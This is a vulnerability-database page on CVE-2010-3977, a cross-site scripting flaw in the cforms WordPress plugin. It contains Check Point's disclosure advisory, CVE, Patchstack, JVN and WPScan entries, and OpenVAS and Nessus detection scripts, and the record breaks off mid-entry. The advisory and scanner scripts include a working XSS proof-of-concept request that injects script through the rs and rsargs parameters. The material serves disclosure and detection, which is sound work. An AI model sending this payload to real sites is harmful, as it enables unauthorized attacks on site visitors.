cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977

2010-11-02T00:00:00

Description

Dear List, I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability. Check Point Software Technologies - Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/ cforms WordPress Plugin Cross Site Scripting Vulnerability CVE-2010-3977 INTRODUCTION According to Delicious Days, "cforms is a powerful and feature rich form plugin for WordPress, offering convenient deployment of multiple Ajax driven contact forms throughout your blog or even on the same page." This problem was confirmed in the following versions of the cforms WordPress Plugin, other versions maybe also affected. cforms v11.5 CVSS Scoring System The CVSS score is: 5.5 Base Score: 6.7 Temporal Score: 5.5 We used the following values to calculate the scores: Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N Temporal score is: E:F/RL:OF/RC:C DETAILS A data array is created in lib_ajax.php using values from a form field in a POST request. The parameters rs and rsargs are not validated and thus it is possible to inject code. Request: http://<server>/wp-content/plugins/cforms/lib_ajax.php POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1 Host: <server> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv: 1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 219 Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do %26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce %26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do %26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765; c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ; comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam %40checkpoint.com Pragma: no-cache Cache-Control: no-cache rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$# $<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http:// www.checkpoint.com$#$<script>alert(1)</script> CREDITS This vulnerability has been brought to our attention by Wagner Elias from Conviso IT Security company (http://www.conviso.com.br) and researched internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT). Best Regards, Rodrigo. -- Rodrigo Rubira Branco Senior Security Researcher Vulnerability Discovery Team (VDT) Check Point Software Technologies

{"id": "SECURITYVULNS:DOC:25042", "bulletinFamily": "software", "title": "cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977", "description": "Dear List,\r\n\r\nI'm writing on behalf of the Check Point Vulnerability Discovery Team to publish\r\nthe following vulnerability.\r\n\r\n\r\n\r\nCheck Point Software Technologies - Vulnerability Discovery Team (VDT)\r\nhttp://www.checkpoint.com/defense/\r\n\r\ncforms WordPress Plugin Cross Site Scripting Vulnerability\r\nCVE-2010-3977\r\n\r\n\r\nINTRODUCTION\r\n\r\nAccording to Delicious Days, "cforms is a powerful and feature rich form plugin\r\nfor WordPress, offering convenient deployment of multiple Ajax \r\ndriven contact forms throughout your blog or even on the same page."\r\n\r\nThis problem was confirmed in the following versions of the cforms WordPress\r\nPlugin, other versions \r\nmaybe also affected.\r\n\r\ncforms v11.5\r\n\r\n\r\nCVSS Scoring System\r\n\r\nThe CVSS score is: 5.5\r\n Base Score: 6.7\r\n Temporal Score: 5.5\r\nWe used the following values to calculate the scores:\r\n Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N\r\n Temporal score is: E:F/RL:OF/RC:C\r\n\r\n\r\nDETAILS\r\n\r\nA data array is created in lib_ajax.php using values from a form field in a POST\r\nrequest. The parameters rs and rsargs are not validated and thus\r\nit is possible to inject code.\r\n\r\nRequest:\r\nhttp://<server>/wp-content/plugins/cforms/lib_ajax.php\r\nPOST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1\r\nHost: <server>\r\nUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:\r\n1.9.2.10) Gecko/20100914 Firefox/3.6.10\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 219\r\nCookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do\r\n%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce\r\n%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do\r\n%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;\r\nc o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8\r\n2 3 8 8 f 6 = t e s t ;\r\ncomment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam\r\n%40checkpoint.com\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nrs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#\r\n$<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http://\r\nwww.checkpoint.com$#$<script>alert(1)</script>\r\n\r\n\r\n\r\nCREDITS\r\n\r\nThis vulnerability has been brought to our attention by Wagner Elias from Conviso\r\nIT Security company (http://www.conviso.com.br) and researched internally by\r\nRodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).\r\n\r\n\r\n\r\n\r\nBest Regards,\r\n \r\nRodrigo.\r\n \r\n--\r\nRodrigo Rubira Branco\r\nSenior Security Researcher\r\nVulnerability Discovery Team (VDT)\r\nCheck Point Software Technologies", "published": "2010-11-02T00:00:00", "modified": "2010-11-02T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25042", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2010-3977"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:37", "edition": 1, "viewCount": 38, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2010-315"]}, {"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "jvn", "idList": ["JVN:35256978"]}, {"type": "nessus", "idList": ["CFORMS_RS_XSS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "patchstack", "idList": ["PATCHSTACK:2F20A9DDD8D69C221F2C2CA471007FAC"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11223"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"]}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2010-315"]}, {"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "dsquare", "idList": ["E-8"]}, {"type": "jvn", "idList": ["JVN:35256978"]}, {"type": "nessus", "idList": ["CFORMS_RS_XSS.NASL"]}, {"type": "seebug", "idList": ["SSV:20225"]}]}, "exploitation": null, "vulnersScore": -0.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1660007784}, "_internal": {"score_hash": "0854888eac2c00af6c60e75d91b3fed4"}}

{"patchstack": [{"lastseen": "2022-06-01T19:53:18", "description": "CformsII plugin is prone to a cross-site scripting vulnerability. It fails to properly clean up user-supplied input. An attacker may execute arbitrary script code in the browser of an user in the context of the affected site. In this way the attacker can steal cookie-based authentication credentials. Other attacks are also possible.\n\n## Solution\n\n\r\n Update the plugin. \r\n ", "cvss3": {}, "published": "2010-11-01T00:00:00", "type": "patchstack", "title": "WordPress CformsII Plugin 11.5 / 13.1 - Multiple Cross-Site Scripting Vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3977"], "modified": "2010-11-01T00:00:00", "id": "PATCHSTACK:2F20A9DDD8D69C221F2C2CA471007FAC", "href": "https://patchstack.com/database/vulnerability/cforms2/wordpress-cformsii-plugin-11-5-13-1-multiple-cross-site-scripting-vulnerabilities", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-11-14T16:30:14", "description": "This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.", "cvss3": {}, "published": "2010-11-16T00:00:00", "type": "openvas", "title": "WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3977"], "modified": "2019-11-12T00:00:00", "id": "OPENVAS:1361412562310801628", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801628", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801628\");\n script_version(\"2019-11-12T13:33:43+0000\");\n script_tag(name:\"last_modification\", value:\"2019-11-12 13:33:43 +0000 (Tue, 12 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 10:37:01 +0100 (Tue, 16 Nov 2010)\");\n script_bugtraq_id(44587);\n script_cve_id(\"CVE-2010-3977\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/42006\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/62938\");\n script_xref(name:\"URL\", value:\"http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary\n code in the context of the application.\");\n script_tag(name:\"affected\", value:\"WordPress plugin cforms Version 11.5 and earlier.\");\n script_tag(name:\"insight\", value:\"The flaws are caused by improper validation of user-supplied\n input passed via the 'rs' and 'rsargs' parameters to\n wp-content/plugins/cforms/lib_ajax.php, which allows attackers to execute\n arbitrary HTML and script code on the web server.\");\n script_tag(name:\"solution\", value:\"Update to cforms Version 11.6.1 or later.\");\n script_tag(name:\"summary\", value:\"This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.deliciousdays.com/cforms-plugin/\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port)) exit(0);\n\nif (dir == \"/\") dir = \"\";\nhostname = http_host_name(port:port);\n\nreq = string(\"POST \",dir,\"/wp-content/plugins/cforms/lib_ajax.php HTTP/1.1\\r\\n\",\n \"Host: \",hostname,\"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\\r\\n\",\n \"Content-Length: 92\\r\\n\\r\\n\",\n \"rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#\",\n \"$<script>alert(1)</script>\\r\\n\");\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(('<script>alert(1)</script>' >< res) &&\n egrep(pattern:\"^HTTP/.* 200 OK\", string:res))\n{\n security_message(port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T12:40:14", "description": "Multiple cross-site scripting (XSS) vulnerabilities in wp-content/plugins/cforms/lib_ajax.php in cforms WordPress plugin 11.5 allow remote attackers to inject arbitrary web script or HTML via the (1) rs and (2) rsargs[] parameters.", "cvss3": {}, "published": "2010-11-03T13:37:00", "type": "cve", "title": "CVE-2010-3977", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3977"], "modified": "2018-10-10T20:06:00", "cpe": ["cpe:/a:deliciousdays:cforms:11.5"], "id": "CVE-2010-3977", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3977", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:deliciousdays:cforms:11.5:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:13:10", "description": "", "cvss3": {}, "published": "2010-11-02T00:00:00", "type": "packetstorm", "title": "cforms WordPress Plugin Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3977"], "modified": "2010-11-02T00:00:00", "id": "PACKETSTORM:95395", "href": "https://packetstormsecurity.com/files/95395/cforms-WordPress-Plugin-Cross-Site-Scripting.html", "sourceData": "`Check Point Software Technologies - Vulnerability Discovery Team (VDT) \nhttp://www.checkpoint.com/defense/ \n \ncforms WordPress Plugin Cross Site Scripting Vulnerability \nCVE-2010-3977 \n \n \nINTRODUCTION \n \nAccording to Delicious Days, \"cforms is a powerful and feature rich form plugin for WordPress, offering convenient deployment of multiple Ajax \ndriven contact forms throughout your blog or even on the same page.\" \n \nThis problem was confirmed in the following versions of the cforms WordPress Plugin, other versions \nmaybe also affected. \n \ncforms v11.5 \n \n \nCVSS Scoring System \n \nThe CVSS score is: 5.5 \nBase Score: 6.7 \nTemporal Score: 5.5 \nWe used the following values to calculate the scores: \nBase score is: AV:N/AC:L/Au:N/C:C/I:C/A:N \nTemporal score is: E:F/RL:OF/RC:C \n \n \nDETAILS \n \nA data array is created in lib_ajax.php using values from a form field in a POST request. The parameters rs and rsargs are not validated and thus \nit is possible to inject code. \n \nRequest: \nhttp://<server>/wp-content/plugins/cforms/lib_ajax.php \nPOST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1 \nHost: <server> \nUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv: \n1.9.2.10) Gecko/20100914 Firefox/3.6.10 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-us,en;q=0.5 \nAccept-Encoding: gzip,deflate \nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \nKeep-Alive: 115 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nContent-Length: 219 \nCookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do \n%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce \n%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do \n%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765; \nc o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ; \ncomment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam \n%40checkpoint.com \nPragma: no-cache \nCache-Control: no-cache \nrs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$# \n$<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http:// \nwww.checkpoint.com$#$<script>alert(1)</script> \n \n \n \nCREDITS \n \nThis vulnerability has been brought to our attention by Wagner Elias from Conviso IT Security company (http://www.conviso.com.br) and researched internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT). \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/95395/cforms-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2021-10-16T02:34:52", "description": "The version of the cformsII plugin for WordPress hosted on the remote web server fails to sanitize user-supplied input to the 'rs' parameter of the 'lib_ajax.php' script before using it to generate dynamic HTML output.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site.\n\nNote that the install is also likely to be vulnerable to a similar cross-site scripting attack involving the 'rsargs' parameter, although Nessus has not checked for this particular issue.", "cvss3": {"score": null, "vector": null}, "published": "2010-11-08T00:00:00", "type": "nessus", "title": "cformsII Plugin for WordPress 'rs' Parameter XSS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3977"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "CFORMS_RS_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/50512", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50512);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-3977\");\n script_bugtraq_id(44587);\n script_xref(name:\"Secunia\", value:\"42006\");\n\n script_name(english:\"cformsII Plugin for WordPress 'rs' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via lib_ajax.php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is vulnerable to a\ncross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/514579/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"cformsII\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"cforms/js/cforms.js\"][0] = make_list('var sajax_');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue.\npayload = SCRIPT_NAME;\nenc_payload = '';\nfor(i=0; i<strlen(payload); i++)\n{\n enc_payload += ord(payload[i]) + ',';\n}\nenc_payload = substr(enc_payload, 0, strlen(enc_payload) - 2);\nalert = '<script>alert(String.fromCharCode('+enc_payload+'))</script>';\n\nvuln = test_cgi_xss(\n port : port,\n cgi : '/wp-content/plugins/cforms/lib_ajax.php',\n dirs : make_list(dir),\n qs : 'rs='+urlencode(str:alert),\n pass_str : '-:' + alert + ' not callable',\n pass2_re : ' not callable'\n);\nif (!vuln)\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:32:49", "description": "The cforms plugin has a XSS vulnerability in file lib_ajax.php with rs and rsargs[] parameters. It is fixed in version 13.2. The cforms2 fork was forked at 14.6, so it is not affected.\n", "cvss3": {}, "published": "2010-11-01T00:00:00", "type": "wpvulndb", "title": "Cforms <= 13.1 - 'lib_ajax.php' Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-3977"], "modified": "2019-11-01T10:12:33", "id": "WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B", "href": "https://wpscan.com/vulnerability/8ce453e5-6eac-4991-bfaf-260d34e0a71b", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "seebug": [{"lastseen": "2017-11-19T18:07:33", "description": "BUGTRAQ ID: 44587\r\nCVE ID: CVE-2010-3977\r\n\r\nWordPress\u662f\u4e00\u6b3e\u514d\u8d39\u7684\u8bba\u575bBlog\u7cfb\u7edf\u3002\r\n\r\nWordPress\u6240\u4f7f\u7528\u7684cformsII\u63d2\u4ef6\u6ca1\u6709\u6b63\u786e\u7684\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7ed9wp-content/plugins/cforms /lib_ajax.php\u9875\u9762\u7684rs\u548crsargs\u53c2\u6570\u4fbf\u663e\u793a\u7ed9\u4e86\u7528\u6237\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u7684POST\u8bf7\u6c42\u6765\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5f53\u7528\u6237\u67e5\u770b\u751f\u6210\u9875\u9762\u65f6\u5c31\u4f1a\u5bfc\u81f4\u6267\u884c\u6240\u6ce8\u5165\u7684\u4ee3\u7801\u3002\n\nNicole Stich cformsII 11.5\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nNicole Stich\r\n------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.deliciousdays.com/cforms-plugin/", "cvss3": {}, "published": "2010-11-03T00:00:00", "type": "seebug", "title": "WordPress cformsII\u63d2\u4ef6rs\u548crsargs\u53c2\u6570\u811a\u672c\u6ce8\u5165\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3977"], "modified": "2010-11-03T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20225", "id": "SSV:20225", "sourceData": "\n Request:\r\n\r\nhttp://<server>/wp-content/plugins/cforms/lib_ajax.php\r\n\r\nPOST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1\r\n\r\nHost: <server>\r\n\r\nUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:\r\n\r\n1.9.2.10) Gecko/20100914 Firefox/3.6.10\r\n\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n\r\nAccept-Language: en-us,en;q=0.5\r\n\r\nAccept-Encoding: gzip,deflate\r\n\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n\r\nKeep-Alive: 115\r\n\r\nConnection: keep-alive\r\n\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n\r\nContent-Length: 219\r\n\r\nCookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do\r\n\r\n%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce\r\n\r\n%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do\r\n\r\n%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;\r\n\r\nc o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ;\r\n\r\ncomment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam\r\n\r\n%40checkpoint.com\r\n\r\nPragma: no-cache\r\n\r\nCache-Control: no-cache\r\n\r\nrs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#\r\n\r\n$<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http://\r\n\r\nwww.checkpoint.com$#$<script>alert(1)</script>\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20225", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "jvn": [{"lastseen": "2021-12-28T23:21:13", "description": "cforms II provided by delicious days is a plugin for WordPress. cforms II contains a cross-site scripting vulnerability. \n\n\n ## Impact\n\nAn arbitrary script may be executed on the user's web browser. \n\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer. \n\n\n ## Products Affected\n\n * cforms II v13.1 and earlier\n", "cvss3": {}, "published": "2012-02-15T00:00:00", "type": "jvn", "title": "JVN#35256978: cforms II vulnerable to cross-site scripting", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 